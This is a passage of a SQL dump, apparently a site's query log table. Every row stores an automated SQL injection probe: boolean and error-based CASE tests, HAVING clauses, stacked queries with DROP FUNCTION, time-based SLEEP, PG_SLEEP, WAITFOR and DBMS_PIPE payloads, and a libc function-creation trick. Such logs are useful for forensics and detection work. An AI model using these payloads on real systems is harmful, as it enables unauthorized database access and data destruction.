(7240, 'dSiI\',(SELECT (CASE WHEN (2678=8841) THEN 0x64536949 ELSE 2678*(SELECT 2678 FROM INFORMATION_SCHEMA.PLUGINS) END))-- TGBF', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:55:15'),
(7242, 'dSiI,(SELECT (CASE WHEN (3377=2255) THEN 0x64536949 ELSE 3377*(SELECT 3377 FROM INFORMATION_SCHEMA.PLUGINS) END))', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:55:18'),
(7244, 'dSiI\',(SELECT (CASE WHEN (4980=3923) THEN 1 ELSE 1/(SELECT 0) END))-- tAEn', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:55:21'),
(7246, 'dSiI,(SELECT (CASE WHEN (8516=2726) THEN 1 ELSE 1/(SELECT 0) END))', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:55:24'),
(7248, 'dSiI\',(SELECT (CASE WHEN (6514=3503) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)-- dBud', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:55:30'),
(7250, 'dSiI,(SELECT (CASE WHEN (4364=8026) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:55:33'),
(7252, 'dSiI\' HAVING 1462=2885-- WEaQ', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:55:37'),
(7254, 'dSiI\') HAVING 3723=4877 AND (\'hfdr\' LIKE \'hfdr', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:55:46'),
(7256, 'dSiI\')) HAVING 1357=3710 AND ((\'jlgR\' LIKE \'jlgR', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:55:50'),
(7258, 'dSiI%\' HAVING 5774=2050 AND \'MOFl%\'=\'MOFl', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:55:53'),
(7260, 'dSiI\' HAVING 6781=8371 AND \'EBfa\' LIKE \'EBfa', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:55:57'),
(7262, 'dSiI\") HAVING 2267=7258 AND (\"RtmT\" LIKE \"RtmT', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:56:06'),
(7264, 'dSiI\" HAVING 3517=1604 AND \"pCMt\" LIKE \"pCMt', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:56:09'),
(7266, 'dSiI\' HAVING 2936=9593 OR \'CCIV\'=\'wiUf', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:56:12'),
(7268, 'dSiI) HAVING 7359=6916-- YaJF', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:56:16'),
(7270, 'dSiI HAVING 8141=7924', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:56:26'),
(7272, 'dSiI HAVING 9743=8055-- SpbQ', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:56:29'),
(7274, 'dSiI HAVING 9410=8247# JYGP', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:56:34'),
(7276, 'dSiI\';SELECT (CASE WHEN (2370=8802) THEN 2370 ELSE 1/(SELECT 0) END)--', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:56:37'),
(7278, 'dSiI\');SELECT (CASE WHEN (5333=8733) THEN 5333 ELSE 1/(SELECT 0) END)--', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:56:40'),
(7280, 'dSiI\'));SELECT (CASE WHEN (9910=9904) THEN 9910 ELSE 1/(SELECT 0) END)--', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:56:43'),
(7282, 'dSiI\')));SELECT (CASE WHEN (2567=5134) THEN 2567 ELSE 1/(SELECT 0) END)--', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:56:45'),
(7284, 'dSiI%\';SELECT (CASE WHEN (8379=2301) THEN 8379 ELSE 1/(SELECT 0) END)--', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:56:48'),
(7286, 'dSiI\");SELECT (CASE WHEN (9533=9817) THEN 9533 ELSE 1/(SELECT 0) END)--', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:56:52'),
(7288, 'dSiI\"));SELECT (CASE WHEN (8584=1782) THEN 8584 ELSE 1/(SELECT 0) END)--', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:56:56'),
(7290, 'dSiI\";SELECT (CASE WHEN (7508=5283) THEN 7508 ELSE 1/(SELECT 0) END)--', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:57:00'),
(7292, 'dSiI);SELECT (CASE WHEN (7019=1572) THEN 7019 ELSE 1/(SELECT 0) END)--', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:57:04'),
(7294, 'dSiI));SELECT (CASE WHEN (2376=5180) THEN 2376 ELSE 1/(SELECT 0) END)--', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:57:08'),
(7296, 'dSiI)));SELECT (CASE WHEN (3308=5325) THEN 3308 ELSE 1/(SELECT 0) END)--', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:57:13'),
(7298, 'dSiI;SELECT (CASE WHEN (8790=9692) THEN 8790 ELSE 1/(SELECT 0) END)--', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:57:17'),
(7300, 'dSiI\';IF(4757=3800) SELECT 4757 ELSE DROP FUNCTION ywsY--', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:57:20'),
(7302, 'dSiI\');IF(4060=6332) SELECT 4060 ELSE DROP FUNCTION chTR--', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:57:25'),
(7304, 'dSiI\'));IF(2816=2436) SELECT 2816 ELSE DROP FUNCTION jxOv--', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:57:30'),
(7306, 'dSiI\')));IF(9776=6458) SELECT 9776 ELSE DROP FUNCTION GGnx--', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:57:33'),
(7308, 'dSiI%\';IF(7683=7274) SELECT 7683 ELSE DROP FUNCTION gxuS--', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:57:36'),
(7310, 'dSiI\");IF(4522=6372) SELECT 4522 ELSE DROP FUNCTION CLEN--', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:57:40'),
(7312, 'dSiI\"));IF(1851=5821) SELECT 1851 ELSE DROP FUNCTION sMhC--', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:57:44'),
(7314, 'dSiI\";IF(7178=4541) SELECT 7178 ELSE DROP FUNCTION lTMi--', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:57:48'),
(7316, 'dSiI);IF(9123=8526) SELECT 9123 ELSE DROP FUNCTION JtLk--', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:57:54'),
(7318, 'dSiI));IF(6561=6474) SELECT 6561 ELSE DROP FUNCTION ywzA--', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:57:58'),
(7320, 'dSiI)));IF(4532=3307) SELECT 4532 ELSE DROP FUNCTION ebLO--', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:58:02'),
(7322, 'dSiI;IF(5886=1829) SELECT 5886 ELSE DROP FUNCTION MzrZ--', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:58:05'),
(7324, 'dSiI\' AND 4664=(\'qkqkq\'||(SELECT CASE 4664 WHEN 4664 THEN 1 ELSE 0 END FROM RDB$DATABASE)||\'qqvbq\')-- xLHh', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:01:43'),
(7326, 'dSiI\') AND 4664=(\'qkqkq\'||(SELECT CASE 4664 WHEN 4664 THEN 1 ELSE 0 END FROM RDB$DATABASE)||\'qqvbq\') AND (\'Odzi\' LIKE \'Odzi', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:01:53'),
(7328, 'dSiI\')) AND 4664=(\'qkqkq\'||(SELECT CASE 4664 WHEN 4664 THEN 1 ELSE 0 END FROM RDB$DATABASE)||\'qqvbq\') AND ((\'NjbJ\' LIKE \'NjbJ', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:01:55'),
(7330, 'dSiI%\' AND 4664=(\'qkqkq\'||(SELECT CASE 4664 WHEN 4664 THEN 1 ELSE 0 END FROM RDB$DATABASE)||\'qqvbq\') AND \'CLaC%\'=\'CLaC', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:01:59'),
(7332, 'dSiI\' AND 4664=(\'qkqkq\'||(SELECT CASE 4664 WHEN 4664 THEN 1 ELSE 0 END FROM RDB$DATABASE)||\'qqvbq\') AND \'VWEe\' LIKE \'VWEe', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:02:03'),
(7334, 'dSiI\") AND 4664=(\'qkqkq\'||(SELECT CASE 4664 WHEN 4664 THEN 1 ELSE 0 END FROM RDB$DATABASE)||\'qqvbq\') AND (\"jasc\" LIKE \"jasc', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:02:07'),
(7336, 'dSiI\" AND 4664=(\'qkqkq\'||(SELECT CASE 4664 WHEN 4664 THEN 1 ELSE 0 END FROM RDB$DATABASE)||\'qqvbq\') AND \"kUXV\" LIKE \"kUXV', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:02:11'),
(7338, 'dSiI\' AND 4664=(\'qkqkq\'||(SELECT CASE 4664 WHEN 4664 THEN 1 ELSE 0 END FROM RDB$DATABASE)||\'qqvbq\') OR \'JVfV\'=\'joOr', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:02:13'),
(7340, 'dSiI) AND 4664=(\'qkqkq\'||(SELECT CASE 4664 WHEN 4664 THEN 1 ELSE 0 END FROM RDB$DATABASE)||\'qqvbq\')-- VVsz', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:02:15'),
(7342, 'dSiI AND 4664=(\'qkqkq\'||(SELECT CASE 4664 WHEN 4664 THEN 1 ELSE 0 END FROM RDB$DATABASE)||\'qqvbq\')', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:02:21'),
(7344, 'dSiI AND 4664=(\'qkqkq\'||(SELECT CASE 4664 WHEN 4664 THEN 1 ELSE 0 END FROM RDB$DATABASE)||\'qqvbq\')-- NanO', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:02:26'),
(7346, 'dSiI AND 4664=(\'qkqkq\'||(SELECT CASE 4664 WHEN 4664 THEN 1 ELSE 0 END FROM RDB$DATABASE)||\'qqvbq\')# oHMU', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:02:30'),
(7348, 'dSiI\' AND 4196=(CODE(113)||CODE(107)||CODE(113)||CODE(107)||CODE(113)||(SELECT CASE 4196 WHEN 4196 THEN CODE(49) ELSE CODE(48) E', 0, 3, NULL, 1, 1, 1, 0, '2025-11-06 16:03:00'),
(7350, 'dSiI\') AND 4196=(CODE(113)||CODE(107)||CODE(113)||CODE(107)||CODE(113)||(SELECT CASE 4196 WHEN 4196 THEN CODE(49) ELSE CODE(48) ', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:02:42'),
(7352, 'dSiI\')) AND 4196=(CODE(113)||CODE(107)||CODE(113)||CODE(107)||CODE(113)||(SELECT CASE 4196 WHEN 4196 THEN CODE(49) ELSE CODE(48)', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:02:44'),
(7354, 'dSiI%\' AND 4196=(CODE(113)||CODE(107)||CODE(113)||CODE(107)||CODE(113)||(SELECT CASE 4196 WHEN 4196 THEN CODE(49) ELSE CODE(48) ', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:02:46'),
(7358, 'dSiI\") AND 4196=(CODE(113)||CODE(107)||CODE(113)||CODE(107)||CODE(113)||(SELECT CASE 4196 WHEN 4196 THEN CODE(49) ELSE CODE(48) ', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:02:54'),
(7360, 'dSiI\" AND 4196=(CODE(113)||CODE(107)||CODE(113)||CODE(107)||CODE(113)||(SELECT CASE 4196 WHEN 4196 THEN CODE(49) ELSE CODE(48) E', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:02:56'),
(7364, 'dSiI) AND 4196=(CODE(113)||CODE(107)||CODE(113)||CODE(107)||CODE(113)||(SELECT CASE 4196 WHEN 4196 THEN CODE(49) ELSE CODE(48) E', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:03:03'),
(7366, 'dSiI AND 4196=(CODE(113)||CODE(107)||CODE(113)||CODE(107)||CODE(113)||(SELECT CASE 4196 WHEN 4196 THEN CODE(49) ELSE CODE(48) EN', 0, 3, NULL, 1, 1, 1, 0, '2025-11-06 16:03:13'),
(7372, 'SELECT \'qkqkq\'||(CASE 9960 WHEN 9960 THEN 1 ELSE 0 END)||\'qqvbq\' FROM RDB$DATABASE', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:04:58'),
(7374, 'dSiI\';SELECT SLEEP(5)#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:05:01'),
(7376, 'dSiI\');SELECT SLEEP(5)#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:05:03'),
(7378, 'dSiI\'));SELECT SLEEP(5)#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:05:05'),
(7380, 'dSiI\')));SELECT SLEEP(5)#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:05:09'),
(7382, 'dSiI%\';SELECT SLEEP(5)#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:05:11'),
(7384, 'dSiI\");SELECT SLEEP(5)#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:05:13'),
(7386, 'dSiI\"));SELECT SLEEP(5)#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:05:15'),
(7388, 'dSiI\";SELECT SLEEP(5)#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:05:18'),
(7390, 'dSiI);SELECT SLEEP(5)#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:05:20'),
(7392, 'dSiI));SELECT SLEEP(5)#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:05:22'),
(7394, 'dSiI)));SELECT SLEEP(5)#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:05:24'),
(7396, 'dSiI;SELECT SLEEP(5)#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:05:26'),
(7398, 'dSiI\';SELECT SLEEP(5)-- Gbfu', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:05:28'),
(7400, 'dSiI\');SELECT SLEEP(5) AND (\'TZnF\' LIKE \'TZnF', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:05:33'),
(7402, 'dSiI\'));SELECT SLEEP(5) AND ((\'ZRQb\' LIKE \'ZRQb', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:05:35'),
(7404, 'dSiI%\';SELECT SLEEP(5) AND \'bnvX%\'=\'bnvX', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:05:37'),
(7406, 'dSiI\';SELECT SLEEP(5) AND \'KfkQ\' LIKE \'KfkQ', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:05:39'),
(7408, 'dSiI\");SELECT SLEEP(5) AND (\"AnFv\" LIKE \"AnFv', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:05:44'),
(7410, 'dSiI\";SELECT SLEEP(5) AND \"FXJT\" LIKE \"FXJT', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:05:46'),
(7412, 'dSiI\';SELECT SLEEP(5) OR \'QLlc\'=\'XFbD', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:05:49'),
(7414, 'dSiI);SELECT SLEEP(5)-- VeZi', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:05:51'),
(7416, 'dSiI;SELECT SLEEP(5)', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:05:55'),
(7418, 'dSiI;SELECT SLEEP(5)-- qtGF', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:05:58'),
(7420, 'dSiI;SELECT SLEEP(5)# eolk', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:06:00'),
(7422, 'dSiI\';(SELECT * FROM (SELECT(SLEEP(5)))uJMa)#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:06:02'),
(7424, 'dSiI\');(SELECT * FROM (SELECT(SLEEP(5)))uJMa)#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:06:04'),
(7426, 'dSiI\'));(SELECT * FROM (SELECT(SLEEP(5)))uJMa)#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:06:06'),
(7428, 'dSiI\')));(SELECT * FROM (SELECT(SLEEP(5)))uJMa)#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:06:08'),
(7430, 'dSiI%\';(SELECT * FROM (SELECT(SLEEP(5)))uJMa)#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:06:10'),
(7432, 'dSiI\");(SELECT * FROM (SELECT(SLEEP(5)))uJMa)#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:06:14'),
(7434, 'dSiI\"));(SELECT * FROM (SELECT(SLEEP(5)))uJMa)#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:06:16'),
(7436, 'dSiI\";(SELECT * FROM (SELECT(SLEEP(5)))uJMa)#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:06:19'),
(7438, 'dSiI);(SELECT * FROM (SELECT(SLEEP(5)))uJMa)#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:06:21'),
(7440, 'dSiI));(SELECT * FROM (SELECT(SLEEP(5)))uJMa)#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:06:23'),
(7442, 'dSiI)));(SELECT * FROM (SELECT(SLEEP(5)))uJMa)#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:06:25'),
(7444, 'dSiI;(SELECT * FROM (SELECT(SLEEP(5)))uJMa)#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:06:27'),
(7446, 'dSiI\';SELECT PG_SLEEP(5)--', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:06:29'),
(7448, 'dSiI\');SELECT PG_SLEEP(5)--', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:06:31'),
(7450, 'dSiI\'));SELECT PG_SLEEP(5)--', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:06:33'),
(7452, 'dSiI\')));SELECT PG_SLEEP(5)--', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:06:40'),
(7454, 'dSiI%\';SELECT PG_SLEEP(5)--', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:06:42'),
(7456, 'dSiI\");SELECT PG_SLEEP(5)--', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:06:44'),
(7458, 'dSiI\"));SELECT PG_SLEEP(5)--', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:06:46'),
(7460, 'dSiI\";SELECT PG_SLEEP(5)--', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:06:50'),
(7462, 'dSiI);SELECT PG_SLEEP(5)--', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:06:53'),
(7464, 'dSiI));SELECT PG_SLEEP(5)--', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:06:55'),
(7466, 'dSiI)));SELECT PG_SLEEP(5)--', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:06:58'),
(7468, 'dSiI;SELECT PG_SLEEP(5)--', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:07:00'),
(7470, 'dSiI\';CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS \'/lib/libc.so.6\',\'sleep\' language \'C\' STRICT; SELECT sleep(5)--', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:07:04'),
(7472, 'dSiI\');CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS \'/lib/libc.so.6\',\'sleep\' language \'C\' STRICT; SELECT sleep(5)--', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:07:06'),
(7474, 'dSiI\'));CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS \'/lib/libc.so.6\',\'sleep\' language \'C\' STRICT; SELECT sleep(5)--', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:07:08'),
(7476, 'dSiI\')));CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS \'/lib/libc.so.6\',\'sleep\' language \'C\' STRICT; SELECT sleep(5)--', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:07:10'),
(7478, 'dSiI%\';CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS \'/lib/libc.so.6\',\'sleep\' language \'C\' STRICT; SELECT sleep(5)--', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:07:13'),
(7480, 'dSiI\");CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS \'/lib/libc.so.6\',\'sleep\' language \'C\' STRICT; SELECT sleep(5)--', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:07:15'),
(7482, 'dSiI\"));CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS \'/lib/libc.so.6\',\'sleep\' language \'C\' STRICT; SELECT sleep(5)--', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:07:17'),
(7484, 'dSiI\";CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS \'/lib/libc.so.6\',\'sleep\' language \'C\' STRICT; SELECT sleep(5)--', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:07:19'),
(7486, 'dSiI);CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS \'/lib/libc.so.6\',\'sleep\' language \'C\' STRICT; SELECT sleep(5)--', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:07:22'),
(7488, 'dSiI));CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS \'/lib/libc.so.6\',\'sleep\' language \'C\' STRICT; SELECT sleep(5)--', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:07:24'),
(7490, 'dSiI)));CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS \'/lib/libc.so.6\',\'sleep\' language \'C\' STRICT; SELECT sleep(5)--', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:07:26'),
(7492, 'dSiI;CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS \'/lib/libc.so.6\',\'sleep\' language \'C\' STRICT; SELECT sleep(5)--', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:07:28'),
(7494, 'dSiI\';WAITFOR DELAY \'0:0:5\'--', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:07:30'),
(7496, 'dSiI\');WAITFOR DELAY \'0:0:5\'--', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:07:32'),
(7498, 'dSiI\'));WAITFOR DELAY \'0:0:5\'--', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:07:34'),
(7500, 'dSiI\')));WAITFOR DELAY \'0:0:5\'--', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:07:36'),
(7502, 'dSiI%\';WAITFOR DELAY \'0:0:5\'--', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:07:39'),
(7504, 'dSiI\");WAITFOR DELAY \'0:0:5\'--', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:07:41'),
(7506, 'dSiI\"));WAITFOR DELAY \'0:0:5\'--', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:07:44'),
(7508, 'dSiI\";WAITFOR DELAY \'0:0:5\'--', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:07:46'),
(7510, 'dSiI);WAITFOR DELAY \'0:0:5\'--', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:07:49'),
(7512, 'dSiI));WAITFOR DELAY \'0:0:5\'--', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:07:51'),
(7514, 'dSiI)));WAITFOR DELAY \'0:0:5\'--', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:07:53'),
(7516, 'dSiI;WAITFOR DELAY \'0:0:5\'--', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:07:55'),
(7518, 'dSiI\';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(116)||CHR(102)||CHR(102),5) FROM DUAL--', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:08:07'),
(7520, 'dSiI\');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(116)||CHR(102)||CHR(102),5) FROM DUAL--', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:08:11'),
(7522, 'dSiI\'));SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(116)||CHR(102)||CHR(102),5) FROM DUAL--', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:08:13'),
(7524, 'dSiI\')));SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(116)||CHR(102)||CHR(102),5) FROM DUAL--', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:08:15'),
(7526, 'dSiI%\';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(116)||CHR(102)||CHR(102),5) FROM DUAL--', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:08:17'),
(7528, 'dSiI\");SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(116)||CHR(102)||CHR(102),5) FROM DUAL--', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:08:19'),
(7530, 'dSiI\"));SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(116)||CHR(102)||CHR(102),5) FROM DUAL--', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:08:21'),
(7532, 'dSiI\";SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(116)||CHR(102)||CHR(102),5) FROM DUAL--', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:08:24'),
(7534, 'dSiI);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(116)||CHR(102)||CHR(102),5) FROM DUAL--', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:08:26'),
(7536, 'dSiI));SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(116)||CHR(102)||CHR(102),5) FROM DUAL--', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:08:30'),
(7538, 'dSiI)));SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(116)||CHR(102)||CHR(102),5) FROM DUAL--', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:08:32'),
(7540, 'dSiI;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(116)||CHR(102)||CHR(102),5) FROM DUAL--', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:08:34'),
(7542, 'dSiI\' AND (SELECT 5022 FROM (SELECT(SLEEP(5)))YrlE)-- Rhsa', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:08:37'),
(7544, 'dSiI\') AND (SELECT 5022 FROM (SELECT(SLEEP(5)))YrlE) AND (\'rHjA\' LIKE \'rHjA', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:08:45'),
(7546, 'dSiI\')) AND (SELECT 5022 FROM (SELECT(SLEEP(5)))YrlE) AND ((\'tkQY\' LIKE \'tkQY', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:08:47'),
(7548, 'dSiI%\' AND (SELECT 5022 FROM (SELECT(SLEEP(5)))YrlE) AND \'OyTX%\'=\'OyTX', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:08:49'),
(7550, 'dSiI\' AND (SELECT 5022 FROM (SELECT(SLEEP(5)))YrlE) AND \'FKDJ\' LIKE \'FKDJ', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:08:52'),
(7552, 'dSiI\") AND (SELECT 5022 FROM (SELECT(SLEEP(5)))YrlE) AND (\"DbQR\" LIKE \"DbQR', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:08:58'),
(7554, 'dSiI\" AND (SELECT 5022 FROM (SELECT(SLEEP(5)))YrlE) AND \"CSah\" LIKE \"CSah', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:09:00'),
(7556, 'dSiI\' AND (SELECT 5022 FROM (SELECT(SLEEP(5)))YrlE) OR \'WFNt\'=\'HfMF', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:09:02'),
(7558, 'dSiI) AND (SELECT 5022 FROM (SELECT(SLEEP(5)))YrlE)-- dMDA', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:09:04'),
(7560, 'dSiI AND (SELECT 5022 FROM (SELECT(SLEEP(5)))YrlE)', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:09:11'),
(7562, 'dSiI AND (SELECT 5022 FROM (SELECT(SLEEP(5)))YrlE)-- mIFv', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:09:14'),
